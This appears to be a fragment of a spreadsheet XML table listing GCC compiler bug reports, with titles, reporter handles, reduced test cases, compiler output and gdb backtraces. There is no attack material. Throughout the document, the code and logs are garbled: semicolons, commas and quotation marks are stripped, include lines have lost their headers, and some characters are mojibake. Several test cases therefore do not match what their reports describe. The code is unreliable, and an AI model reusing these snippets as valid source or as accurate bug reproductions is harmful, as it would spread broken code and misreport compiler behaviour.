    <t>Here is the test example that causes the problem. I tried to reduce it to its
strict minimum:
test.cpp:
#include 
class A  {
  std::string mesg
}
class B : public virtual A {}
template  class C : public B {}
int main() {
  C j
}
By compiling it with g++ 3.3.1 (Mandrake 9.2):
   g++ -O1 -o test test.cpp
Returns error:
/tmp/ccwnGZD1.o(.text+0x23): In function `main':
: undefined reference to `VTT for C'
collect2: ld a retournÃ© 1 code d'Ã©tat d'exÃ©cution
  It seems that it has some problem instanciating the template class C
automatically. Here are different tests that DO work (each test is independant):
   - replace std::string mesg by int mesg
   - manually instanciate template class by putting
        template class C
      just before the main declaration
   - Move the delaration of j outside of main (global definition)
   - Compile with no optimisation (-O0 for example)
To clarify things I tested this under:
   gcc 3.3.1 by Mandrake 9.2 : Failed
   gcc 3.3.2 by Fedora : Failed
   gcc 3.3.3 home compiled (with no options) : Failed
   gcc 3.2.2 by RedHat 9 : Work
I thus suspect that this problem appeared with gcc versions 3.3 . It may also be
that gcc 3.3 is more strict on the code but I have found no indication to suport
this.
Clement Menier.</t>
  </si>
  <si>
    <t>Clement.Menier</t>
  </si>
  <si>
    <t>GCC-12925</t>
  </si>
  <si>
    <t>Mistaking a bad function declaration for a function call with no return</t>
  </si>
  <si>
    <t>Hi the compiler is crashing here.
It only crashes when you pass it a member as a parameter I think that it is
mistaking a bad function declaration as a call.
// SNIP
struct goo{ 
      char* alloc(int x) 
}
struct dar{ 
      int size 
      int goo() {  char* goo::alloc(size)  }
      int goo2() {  char* goo::alloc(1)  } // not a problem
}
// SNIP</t>
  </si>
  <si>
    <t>md</t>
  </si>
  <si>
    <t>GCC-59101</t>
  </si>
  <si>
    <t>[4.7 Regression] integer wrong code bug</t>
  </si>
  <si>
    <t>$ gcc -O0 foo.c  ./a.out 
7
$ gcc -O1 foo.c  ./a.out 
6
$ cat foo.c
int printf(const char * ...)
int a b
int main() {
  b = (~a 
  printf(%d\n b)
  return 0
}
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/regehr/z/compiler-install/gcc-r204695-install/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /home/regehr/z/compiler-source/gcc/configure --prefix=/home/regehr/z/compiler-install/gcc-r204695-install --enable-languages=cc++ --enable-multilib
Thread model: posix
gcc version 4.9.0 20131112 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-52871</t>
  </si>
  <si>
    <t>segmentation fault with wrongly-formed lambdas</t>
  </si>
  <si>
    <t>Created attachment 27091
try to compile this using: g++-4.6 -g -std=c++0x x.cpp
Probably wrong syntax/understanding causing SEGV in gcc 4.5 and gcc 4.6
$ g++-4.6 -g -std=c++0x -v -save-temps x.cpp
Using built-in specs.
COLLECT_GCC=g++-4.6
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.6-20101220-1' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-multiarch --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-gold --enable-ld=default --with-plugin-ld=ld.gold --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.6.0 20101220 (experimental) [trunk revision 168097] (Ubuntu/Linaro 4.6-20101220-1) 
COLLECT_GCC_OPTIONS='-g' '-std=c++0x' '-v' '-save-temps' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/4.6.0/cc1plus -E -quiet -v -D_GNU_SOURCE x.cpp -mtune=generic -march=x86-64 -std=c++0x -g -fworking-directory -fpch-preprocess -o x.ii
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/x86_64-linux-gnu/4.6.0/../../../../x86_64-linux-gnu/include
ignoring nonexistent directory /usr/include/x86_64-linux-gnu
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/4.6
 /usr/include/c++/4.6/x86_64-linux-gnu
 /usr/include/c++/4.6/backward
 /usr/lib/gcc/x86_64-linux-gnu/4.6.0/include
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/4.6.0/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-g' '-std=c++0x' '-v' '-save-temps' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/4.6.0/cc1plus -fpreprocessed x.ii -quiet -dumpbase x.cpp -mtune=generic -march=x86-64 -auxbase x -g -std=c++0x -version -o x.s
GNU C++ (Ubuntu/Linaro 4.6-20101220-1) version 4.6.0 20101220 (experimental) [trunk revision 168097] (x86_64-linux-gnu)
	compiled by GNU C version 4.6.0 20101220 (experimental) [trunk revision 168097] GMP version 4.3.2 MPFR version 3.0.0-p3 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (Ubuntu/Linaro 4.6-20101220-1) version 4.6.0 20101220 (experimental) [trunk revision 168097] (x86_64-linux-gnu)
	compiled by GNU C version 4.6.0 20101220 (experimental) [trunk revision 168097] GMP version 4.3.2 MPFR version 3.0.0-p3 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: dfbc99081573568ba8a67f5ca3d62186
g++-4.6: internal compiler error: Segmentation fault (program cc1plus)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>volpyansky+gcc</t>
  </si>
  <si>
    <t>GCC-63641</t>
  </si>
  <si>
    <t>[5 Regression] Invalid shift leads to incorrect code on 32-bit system</t>
  </si>
  <si>
    <t>Compile and run this program with -m32 -O2 on an x86 system.
#include 
int f (unsigned char) __attribute__ ((noinline))
int
f (unsigned char b)
{
  if (0x0 &lt;= b &amp;&amp; b &lt;= 0x8)
    goto L
  if (b == 0x0b)
    goto L
  if (0x0e &lt;= b &amp;&amp; b &lt;= 0x1a)
    goto L
  if (0x1c &lt;= b &amp;&amp; b &lt;= 0x1f)
    goto L
  return 0
 L:
  return 1
}
int
main ()
{
  printf (%d\n f (' '))
}
The program should print 0.  However when compiled with -m32 -O2 with current mainline (revision 216611) it prints 1.
The generated code for f is:
00000000 :
   0:   8b 4c 24 04             mov    0x4(%esp)%ecx
   4:   31 c0                   xor    %eax%eax
   6:   80 f9 20                cmp    $0x20%cl
   9:   77 0a                   ja     15 
   b:   b8 ff c9 ff f7          mov    $0xf7ffc9ff%eax
  10:   d3 e8                   shr    %cl%eax
  12:   83 e0 01                and    $0x1%eax
  15:   f3 c3                   repz ret 
The bug is obvious: when the value in %cl is 0x20 the shr does nothing.  The ja needs to be a jae.</t>
  </si>
  <si>
    <t>GCC-22170</t>
  </si>
  <si>
    <t>[4.0 only] Handle format slash error</t>
  </si>
  <si>
    <t>write (* (3/))
end
output 9 lines. Seems to double count repeated slash.</t>
  </si>
  <si>
    <t>fengwang</t>
  </si>
  <si>
    <t>GCC-817</t>
  </si>
  <si>
    <t>ARM compiler generates out-of-range accesses to constant pool data</t>
  </si>
  <si>
    <t>Constants more than one word in size are somtimes placed too far from the instruction that refers to them.
See http://gcc.gnu.org/ml/gcc-patches/2000-09/msg00691.html for details test case and a proposed patch.
Release:
unknown</t>
  </si>
  <si>
    <t>philb</t>
  </si>
  <si>
    <t>GCC-24829</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] libobjc testsuite failures</t>
  </si>
  <si>
    <t>Running /test/gnu/gcc-3.3/gcc/gcc/testsuite/objc.dg/dg.exp ...
FAIL: objc.dg/bitfield-1.m (test for excess errors)
FAIL: objc.dg/bitfield-1.m execution test
FAIL: objc.dg/bitfield-3.m (test for excess errors)
FAIL: objc.dg/bitfield-3.m execution test
FAIL: objc.dg/bitfield-5.m (test for excess errors)
FAIL: objc.dg/bitfield-5.m execution test
FAIL: objc.dg/call-super-1.m (test for excess errors)
FAIL: objc.dg/call-super-1.m execution test
FAIL: objc.dg/call-super-3.m (test for excess errors)
FAIL: objc.dg/call-super-3.m execution test
FAIL: objc.dg/category-1.m (test for excess errors)
FAIL: objc.dg/category-1.m execution test
FAIL: objc.dg/defs.m (test for excess errors)
FAIL: objc.dg/defs.m execution test
FAIL: objc.dg/desig-init-1.m (test for excess errors)
FAIL: objc.dg/desig-init-1.m execution test
FAIL: objc.dg/encode-1.m (test for excess errors)
FAIL: objc.dg/encode-1.m execution test
FAIL: objc.dg/encode-2.m (test for excess errors)
FAIL: objc.dg/encode-2.m execution test
FAIL: objc.dg/encode-3.m (test for excess errors)
FAIL: objc.dg/encode-3.m execution test
FAIL: objc.dg/encode-4.m (test for excess errors)
FAIL: objc.dg/encode-4.m execution test
FAIL: objc.dg/func-ptr-1.m (test for excess errors)
FAIL: objc.dg/func-ptr-1.m execution test
FAIL: objc.dg/func-ptr-2.m (test for excess errors)
FAIL: objc.dg/func-ptr-2.m execution test
FAIL: objc.dg/method-10.m (test for excess errors)
FAIL: objc.dg/method-10.m execution test
FAIL: objc.dg/method-13.m (test for excess errors)
FAIL: objc.dg/method-13.m execution test
FAIL: objc.dg/method-3.m (test for excess errors)
FAIL: objc.dg/method-3.m execution test
FAIL: objc.dg/proto-lossage-3.m (test for excess errors)
FAIL: objc.dg/proto-lossage-3.m execution test
FAIL: objc.dg/proto-qual-1.m (test for excess errors)
FAIL: objc.dg/proto-qual-1.m execution test
FAIL: objc.dg/sizeof-1.m (test for excess errors)
FAIL: objc.dg/sizeof-1.m execution test
FAIL: objc.dg/stret-1.m (test for excess errors)
FAIL: objc.dg/stret-1.m execution test
FAIL: objc.dg/super-class-3.m (test for excess errors)
FAIL: objc.dg/super-class-3.m execution test
FAIL: objc.dg/type-size-2.m (test for excess errors)
FAIL: objc.dg/type-size-2.m execution test
FAIL: objc.dg/type-stream-1.m (test for excess errors)
FAIL: objc.dg/type-stream-1.m execution test
FAIL: objc.dg/va-meth-1.m (test for excess errors)
FAIL: objc.dg/va-meth-1.m execution test
Running /test/gnu/gcc-3.3/gcc/gcc/testsuite/objc.dg/special/special.exp ...
FAIL: objc.dg/special/unclaimed-category-1.m unclaimed-category-1a.o (test for e
xcess errors)
FAIL: objc.dg/special/unclaimed-category-1.m unclaimed-category-1a.o execution t
est
Executing on host: /test/gnu/gcc-3.3/objdir/gcc/xgcc -B/test/gnu/gcc-3.3/objdir/
gcc/ /test/gnu/gcc-3.3/gcc/gcc/testsuite/objc.dg/bitfield-1.m    -I/test/gnu/gcc
-3.3/gcc/gcc/testsuite/../../libobjc -L/test/gnu/gcc-3.3/objdir/hppa64-hp-hpux11
.11/./libobjc/.libs  -lobjc -lm   -o ./bitfield-1.exe    (timeout = 300)
ld: (Warning) Unsatisfied symbol pthread_create in file /test/gnu/gcc-3.3/objd
ir/hppa64-hp-hpux11.11/./libobjc/.libs/libobjc.sl
ld: (Warning) Unsatisfied symbol pthread_attr_init in file /test/gnu/gcc-3.3/o
bjdir/hppa64-hp-hpux11.11/./libobjc/.libs/libobjc.sl
2 warnings.
Symbols from /test/gnu/gcc-3.3/objdir/hppa64-hp-hpux11.11/./libobjc/.libs/libobj
c.sl.1:
[Index]    Value                  Size    Type  Bind  O Shndx    Name
...
[742]    |                     0|       0|FUNC |GLOB |0|   UNDEF|pthread_attr_in
...
[593]    |                     0|       0|FUNC |GLOB |0|   UNDEF|pthread_create
We have in sys/pthread.h:
#ifdef __lint
        extern int pthread_attr_init(pthread_attr_t *)
#else /* ! __lint */
        extern int __pthread_attr_init_system(pthread_attr_t *attr)
#ifdef __cplusplus
        inline int pthread_attr_init(
#else /* !__cplusplus */
        static int pthread_attr_init(
#endif /* !__cplusplus */
                                     pthread_attr_t *attr)
                   { return(__pthread_attr_init_system(attr)) }
#endif /* ! __lint */
and
#ifdef __lint
        extern int pthread_create(pthread_t *tid
                                  const pthread_attr_t *attr
                                  void *(*start_routine)(void *)
                                  void *arg)
#else /* ! __lint */
        extern int __pthread_create_system(pthread_t *tid
                                           const pthread_attr_t *attr
                                           void *(*start_routine)(void *)
                                           void *arg)
#ifdef __cplusplus
        inline int pthread_create(
#else /* !__cplusplus */
        static int pthread_create(
#endif /* !__cplusplus */
                                  pthread_t *tid
                                  const pthread_attr_t *attr
                                  void *(*start_routine)(void *)
                                  void *arg)
            { return(__pthread_create_system(tid attr start_routine arg)) }
#endif /* ! __lint */
Thus these routines should never be needed if the sys/pthread.h is included.</t>
  </si>
  <si>
    <t>GCC-6310</t>
  </si>
  <si>
    <t>gcc -MF vs. depcomp</t>
  </si>
  <si>
    <t>automake &gt; 1.4's depcomp uses
  $@ -MT $object -MD -MP -MF $tmpdepfile
to compute dependencies.
This basically causes it to invoke gcc this way:
gcc -g -O2 -c hello.c -MT hello.o -MD -MP -MF .deps/hello.TPo
Which now causes warning of this kind:
gcc: unrecognized option `-MF'
This has worked for gcc-3.0.x up to 3.0.4 but has stopped working with post-3.0.4 gcc's from the gcc-3.0-branch.
AFAI understand probably this patch below is the origin of this problem:
2002-03-24  Neil Booth  
	preprocessor/3951
	* gcc.c (cpp_options): Pass -MD through as -MD not -M -MF.
Release:
gcc-3.0.5 (20020410)
Environment:
Linux i386/ELF
How-To-Repeat:
Compile an arbitrary C-sources with gcc-3.0.5 from CVS/gcc-3-0-branch depcomp-style:
Eg.:
gcc -g -O2 -c hello.c -MT hello.o -MD -MP -MF deps/hello.TPo
gcc: unrecognized option `-MF'</t>
  </si>
  <si>
    <t>GCC-45112</t>
  </si>
  <si>
    <t>[4.5 regression] Aligned attribute on static class member definition ignored</t>
  </si>
  <si>
    <t>Building the following testcase fails with G++ 4.5 and later.
G++ 4.4 works fine.
struct JSString
{
  unsigned char mLength
  static JSString unitStringTable[]
}
JSString JSString::unitStringTable[] __attribute__ ((aligned (8))) = { 1 }
int bug [__alignof__ (JSString::unitStringTable) &gt;= 8 ? 1 : -1]
The test case is reduced from Mozilla where the bug sometimes causes the JavaScript interpreter to crash.  See also:
https://bugzilla.mozilla.org/show_bug.cgi?id=582593
The problem appears to be that cp-decl.c:duplicate_decls fails to merge
the DECL_USER_ALIGN flag from the definition into the declaration.
This bug was introduced by the following patch:
http://gcc.gnu.org/ml/gcc-patches/2009-06/msg00763.html
Before that patch the DECL_USER_ALIGN flag was part of a block copied in whole via memcpy by duplicate_decls.  The patch moved that flag to another location outside that block so it is no longer copied ...</t>
  </si>
  <si>
    <t>GCC-26348</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE compiling a-textio.adb at -O1 -ftree-vrp</t>
  </si>
  <si>
    <t>I'm seeing bootstrap failing on x86 and amd64-linux:
WORK Thu Feb 16 21:06:28 UTC 2006 (revision 111151)
FAIL Fri Feb 17 12:16:43 UTC 2006 (revision 111180)
FAIL Fri Feb 17 20:56:47 UTC 2006 (revision 111208)
...
/home/guerby/work/gcc/build/build-head-20060217T133449/./gcc/xgcc -B/home/guerby/work/gcc/build/build-head-20060217T133449/./gcc/ -B/home/guerby/work/gcc/install/install-head-20060217T133449/x86_64-unknown-linux-gnu/bin/ -B/home/guerby/work/gcc/install/install-head-20060217T133449/x86_64-unknown-linux-gnu/lib/ -isystem /home/guerby/work/gcc/install/install-head-20060217T133449/x86_64-unknown-linux-gnu/include -isystem /home/guerby/work/gcc/install/install-head-20060217T133449/x86_64-unknown-linux-gnu/sys-include -c -g -O2 -fPIC      -W -Wall -gnatpg  a-textio.adb -o a-textio.o
xgcc: Internal error: Killed (program gnat1)
Please submit a full bug report.
See  for instructions.
make[7]: *** [a-textio.o] Error 1
make[7]: Leaving directory `/home/guerby/work/gcc/build/build-head-20060217T133449/gcc/ada/rts'
make[6]: *** [gnatlib] Error 2
make[6]: Leaving directory `/home/guerby/work/gcc/build/build-head-20060217T133449/gcc/ada'
make[5]: *** [gnatlib-shared-default] Error 2
make[5]: Leaving directory `/home/guerby/work/gcc/build/build-head-20060217T133449/gcc/ada'
make[4]: *** [gnatlib-shared-dual] Error 2
make[4]: Leaving directory `/home/guerby/work/gcc/build/build-head-20060217T133449/gcc/ada'
make[3]: *** [gnatlib-shared] Error 2
make[3]: Leaving directory `/home/guerby/work/gcc/build/build-head-20060217T133449/gcc/ada'
make[2]: *** [gnatlib-shared] Error 2
make[2]: Leaving directory `/home/guerby/work/gcc/build/build-head-20060217T133449/x86_64-unknown-linux-gnu/libada'
make[1]: *** [all-target-libada] Error 2
make[1]: Leaving directory `/home/guerby/work/gcc/build/build-head-20060217T133449'
make: *** [bootstrap] Error 2
gnat1 goes up in RAM until a SEGV. At 700MB here is a backtrace
0x085d480c in build_int_cst_wide (type=0x4016c284 low=1 hi=0) at /home/guerby/work/gcc/version-head/gcc/tree.c:861
861           t = TREE_VEC_ELT (TYPE_CACHED_VALUES (type) ix)
(gdb) bt
#0  0x085d480c in build_int_cst_wide (type=0x4016c284 low=1 hi=0) at /home/guerby/work/gcc/version-head/gcc/tree.c:861
#1  0x085d5140 in build_int_cst (type=0x0 low=1) at /home/guerby/work/gcc/version-head/gcc/tree.c:695
#2  0x08664915 in instantiate_parameters_1 (loop=0x8eed060 chrec= flags= cache=0xb78b058 size_expr=0)
    at tree-chrec.h:108
#3  0x0866585e in instantiate_parameters (loop=0x8eed060 chrec=0x410f1cf8) at /home/guerby/work/gcc/version-head/gcc/tree-scalar-evolution.c:2209
#4  0x08604abe in vrp_visit_assignment (stmt=0x40f119b4 output_p=0xbfffec88) at /home/guerby/work/gcc/version-head/gcc/tree-vrp.c:1970
#5  0x0834b996 in simulate_stmt (stmt=0x40f119b4) at /home/guerby/work/gcc/version-head/gcc/tree-ssa-propagate.c:306
#6  0x0834bba7 in process_ssa_edge_worklist (worklist=0x8ce6e98) at /home/guerby/work/gcc/version-head/gcc/tree-ssa-propagate.c:380
#7  0x0834bff2 in ssa_propagate (visit_stmt=0x86050a0  visit_phi=0x86009f0 )
    at /home/guerby/work/gcc/version-head/gcc/tree-ssa-propagate.c:683
#8  0x086067e0 in execute_vrp () at /home/guerby/work/gcc/version-head/gcc/tree-vrp.c:4569
#9  0x085f6369 in execute_one_pass (pass=0x8d8c710) at /home/guerby/work/gcc/version-head/gcc/passes.c:854
#10 0x085f64ff in execute_pass_list (pass=0x8d8c710) at /home/guerby/work/gcc/version-head/gcc/passes.c:898
#11 0x085f6512 in execute_pass_list (pass=0x88874e0) at /home/guerby/work/gcc/version-head/gcc/passes.c:899
#12 0x082f5272 in tree_rest_of_compilation (fndecl=0x4020c600) at /home/guerby/work/gcc/version-head/gcc/tree-optimize.c:412
#13 0x080647e4 in gnat_expand_body (gnu_decl=0x4020c600) at /home/guerby/work/gcc/version-head/gcc/ada/misc.c:653
#14 0x0864c392 in cgraph_expand_function (node=0x40f09380) at /home/guerby/work/gcc/version-head/gcc/cgraphunit.c:1101
#15 0x0864ecbd in cgraph_optimize () at /home/guerby/work/gcc/version-head/gcc/cgraphunit.c:1166
#16 0x080651ef in gnat_parse_file (set_yydebug=0) at /home/guerby/work/gcc/version-head/gcc/ada/misc.c:245
#17 0x085c3265 in toplev_main (argc=16 argv=0xbfffef74) at /home/guerby/work/gcc/version-head/gcc/toplev.c:999
#18 0x082eb57f in main (argc=Cannot access memory at address 0x8
) at /home/guerby/work/gcc/version-head/gcc/main.c:35
At 900MB
fold_binary (code=PLUS_EXPR type=0x4019e8fc op0=0x7568fa68 op1=0x4020fdb0) at /home/guerby/work/gcc/version-head/gcc/fold-const.c:7236
7236      enum tree_code_class kind = TREE_CODE_CLASS (code)
(gdb) bt
#0  fold_binary (code=PLUS_EXPR type=0x4019e8fc op0=0x7568fa68 op1=0x4020fdb0) at /home/guerby/work/gcc/version-head/gcc/fold-const.c:7236
#1  0x08441777 in fold_build2_stat (code=PLUS_EXPR type=0x4019e8fc op0=0x7568fa68 op1=0x4020fdb0)
    at /home/guerby/work/gcc/version-head/gcc/fold-const.c:10781
#2  0x086c0db0 in scev_probably_wraps_p (type=0x4019e8fc base=0x7568fa44 step=0x4020fdb0 at_stmt=0x4114c0d8 loop=0x8eed060
    init_is_max=0xbfffec4b  unknown_max=0xbfffec4a ) at /home/guerby/work/gcc/version-head/gcc/tree-ssa-loop-niter.c:1926
#3  0x08604cb5 in vrp_visit_assignment (stmt=0x4114c0d8 output_p=0xbfffec88) at /home/guerby/work/gcc/version-head/gcc/tree-vrp.c:1984
#4  0x0834b996 in simulate_stmt (stmt=0x4114c0d8) at /home/guerby/work/gcc/version-head/gcc/tree-ssa-propagate.c:306
#5  0x0834bba7 in process_ssa_edge_worklist (worklist=0x8ce6e98) at /home/guerby/work/gcc/version-head/gcc/tree-ssa-propagate.c:380
#6  0x0834bff2 in ssa_propagate (visit_stmt=0x86050a0  visit_phi=0x86009f0 )
    at /home/guerby/work/gcc/version-head/gcc/tree-ssa-propagate.c:683
#7  0x086067e0 in execute_vrp () at /home/guerby/work/gcc/version-head/gcc/tree-vrp.c:4569
#8  0x085f6369 in execute_one_pass (pass=0x8d8c710) at /home/guerby/work/gcc/version-head/gcc/passes.c:854
#9  0x085f64ff in execute_pass_list (pass=0x8d8c710) at /home/guerby/work/gcc/version-head/gcc/passes.c:898
#10 0x085f6512 in execute_pass_list (pass=0x88874e0) at /home/guerby/work/gcc/version-head/gcc/passes.c:899
#11 0x082f5272 in tree_rest_of_compilation (fndecl=0x4020c600) at /home/guerby/work/gcc/version-head/gcc/tree-optimize.c:412
#12 0x080647e4 in gnat_expand_body (gnu_decl=0x4020c600) at /home/guerby/work/gcc/version-head/gcc/ada/misc.c:653
#13 0x0864c392 in cgraph_expand_function (node=0x40f09380) at /home/guerby/work/gcc/version-head/gcc/cgraphunit.c:1101
#14 0x0864ecbd in cgraph_optimize () at /home/guerby/work/gcc/version-head/gcc/cgraphunit.c:1166
#15 0x080651ef in gnat_parse_file (set_yydebug=0) at /home/guerby/work/gcc/version-head/gcc/ada/misc.c:245
#16 0x085c3265 in toplev_main (argc=16 argv=0xbfffef74) at /home/guerby/work/gcc/version-head/gcc/toplev.c:999
#17 0x082eb57f in main (argc=Cannot access memory at address 0x0
) at /home/guerby/work/gcc/version-head/gcc/main.c:35
At -O1 the compilation is successfull at -O1 -ftree-vrp it doesn't.
The only explicit VRP change in the revision range is:
r111175 | law | 2006-02-17 05:15:32 +0100 (Fri 17 Feb 2006) | 33 lines
        * tree-vrp.c (set_value_range_to_nonnegative): New function.
        (vrp_expr_computes_nonnegative ssa_name_nonnegative_p): Likewise.
        (ssa_name_nonzero_p): Likewise.
        (get_value_range): Return NULL if VRP is not running.
...</t>
  </si>
  <si>
    <t>GCC-7345</t>
  </si>
  <si>
    <t>parse error when using templated member function from templated base class</t>
  </si>
  <si>
    <t>compiling this program:
-----------------------------------------------------
//#include
template
class A {
public:
  template
  int foo() { return (x + y) }
  int foo2() { return foo() }
}
template
class B : public A {
public:
  int bar() { 
    return ( foo() )
  }
}
int main() {
  int i
  A a
  i = a.foo()
  //printf(%d\n i)
  i = a.foo2()
  //printf(%d\n i)
  B b
  i = b.bar()
  //printf(%d\n i)
  return(0)
}
-----------------------------------------------------
results in this parse error:
-----------------------------------------------------
bug.cc: In member function `int B::bar()':
bug.cc:16: parse error before `' token
-----------------------------------------------------
I think that the compiler is not recognizing foo as the name of a function as it should.
I don't know of any workaround to call foo from within B.  A::foo() doesn't work using A::foo doesn't work declaring a function pointer doesn't work etc.
Release:
gcc version 3.0.4
Environment:
x86 linux
How-To-Repeat:
compile the program</t>
  </si>
  <si>
    <t>ronny</t>
  </si>
  <si>
    <t>GCC-7808</t>
  </si>
  <si>
    <t>Compiler ignores cast from 'id' to 'id' or from 'id' to 'id'</t>
  </si>
  <si>
    <t>The compiler seems to be ignoring casts from 'id'
to 'id' and from 'id' to 'id'.
It's a regression: previous compilers (eg 2.95 and 2.91.66)
did the cast properly.
Release:
GCC 3.3 (also reported in 3.2)
How-To-Repeat:
Compile the attached testcase - no warnings should be 
generated.
Under 3.3 (and I was told under 3.2) spurious warnings are
generated instead because the compiler seems to be ignoring
the casts</t>
  </si>
  <si>
    <t>GCC-60376</t>
  </si>
  <si>
    <t>[4.9 Regression] [c++1y] ICE on invalid with using declaration in template function</t>
  </si>
  <si>
    <t>The following invalid testcase (compiled with -std=c++1y) triggers
an ICE on trunk:
====================================
struct A
{
  int foo()
}
template void bar()
{
  using (A().foo)
}
====================================
bug.cc: In function 'void bar()':
bug.cc:8:9: error: expected nested-name-specifier before '(' token
   using (A().foo)
         ^
bug.cc:8:9: error: expected unqualified-id before '(' token
bug.cc:8:9: error: expected '' before '(' token
bug.cc:8:18: internal compiler error: in type_dependent_expression_p at cp/pt.c:20901
   using (A().foo)
                  ^
0x6049a1 type_dependent_expression_p(tree_node*)
        ../../gcc/gcc/cp/pt.c:20900
0x72d994 finish_expr_stmt(tree_node*)
        ../../gcc/gcc/cp/semantics.c:686
0x6b4788 cp_parser_statement
        ../../gcc/gcc/cp/parser.c:9473
0x6b5559 cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:9745
0x6b56c6 cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:9699
0x6c667b cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:18694
0x6c667b cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/gcc/cp/parser.c:18730
0x6cdc12 cp_parser_function_definition_after_declarator
        ../../gcc/gcc/cp/parser.c:22843
0x6ceab1 cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc/gcc/cp/parser.c:22755
0x6ceab1 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16589
0x6cee4a cp_parser_single_declaration
        ../../gcc/gcc/cp/parser.c:23164
0x6cf134 cp_parser_template_declaration_after_export
        ../../gcc/gcc/cp/parser.c:22966
0x6da4d9 cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10947
0x6d8fc8 cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10869
0x6da87a cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:4014
0x6da87a c_parse_file()
        ../../gcc/gcc/cp/parser.c:31590
0x7f9fe3 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1060
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-36526</t>
  </si>
  <si>
    <t>pointer in pure function</t>
  </si>
  <si>
    <t>Hi 
 I discovered a problem with gfortran 4.3.1 when compiling code with pure function with pointer argument. Inside the pure function the argument is passed further to an other function. This seems to work as long this other function is an intrinsic function but seems to fail for user defined pure functions. The effect is demonstrated by the code below.
  Best regards
    BÃ¡lint
--------------------------------------------------------
module TestPure
  implicit none
  type T1
    character(10) :: str
  end type T1
contains
  pure function getT1Len(self) result(t1len)
    type(T1) pointer :: self
    integer :: t1len
    t1len = getStrLen(self%str)
    !t1len = len_trim(self%str)   ! &lt;- this would work
  end function getT1Len
  pure function getStrLen(str) result(length)
    character(*) intent(in) :: str
    integer :: length
    length = len_trim(str)
  end function getStrLen
end module TestPure
program Test
  use TestPure
  implicit none
  type(T1) pointer :: pT1
  allocate(pT1)
  pT1%str = test
  write (**) getT1Len(pT1)
  deallocate(pT1)
end program Test
------------------------------------------------------</t>
  </si>
  <si>
    <t>baradi09</t>
  </si>
  <si>
    <t>GCC-7952</t>
  </si>
  <si>
    <t>obnoxious warning on -I</t>
  </si>
  <si>
    <t>When I say -I /usr/local/include I get:
cc1plus: warning: changing search order for system directory /usr/local/include
cc1plus: warning:   as it has already been specified as a non-system directory
This is annoying since that means just about all my old code gets that warning (anything that used a locally-installed library that is).  The warning was not in any gcc prior to 3.1
Release:
gcc-3.1 gcc-3.2
Environment:
redhat 7.1</t>
  </si>
  <si>
    <t>GCC-36214</t>
  </si>
  <si>
    <t>Wrong simplification of BOZ constants</t>
  </si>
  <si>
    <t>$ cat u.f90
   implicit none
   real parameter :: r = transfer(00.)
   real(kind=8) parameter :: rd = dble(b'00000000000000000000000000000000&amp;
                                         &amp;01000000001010010101001111111101')
   if (cmplx(b'00000000000000000000000000000000&amp;
              &amp;01000000001010010101001111111101'08) /= rd) call abort
end
$ gfortran u.f90 &amp;&amp; ./a.out 
Aborted
That's on x86_64-linux and the weird thing is: if you remove the useless definition of r it starts working again :)  And yet valgrind doesn't have anything to say. I'm mystified.
(PS: I found that one while investigating PR36186 but it's independent.)</t>
  </si>
  <si>
    <t>domob</t>
  </si>
  <si>
    <t>GCC-81052</t>
  </si>
  <si>
    <t>ICE in verify_dominators at dominance.c:1184</t>
  </si>
  <si>
    <t>Created attachment 41535
preprocessed code
Using gcc:
g++ (GCC) 8.0.0 20170610 (experimental)
Copyright (C) 2017 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Running
g++ -std=c++1z -fconcepts -fopenmp-simd ice.cpp
with the attached file produces this ICE:
/Users/rnickb/proj/satyr/include/satyr/serial_for.h:40:6: error: dominator of 10 should be 11 not 2
 bool for_with_cancel(Policy policy index_t first index_t last F f) {
      ^~~~~~~~~~~~~~~
during GIMPLE pass: ompexp
/Users/rnickb/proj/satyr/include/satyr/serial_for.h:40:6: internal compiler error: in verify_dominators at dominance.c:1184
during GIMPLE pass: ompexp
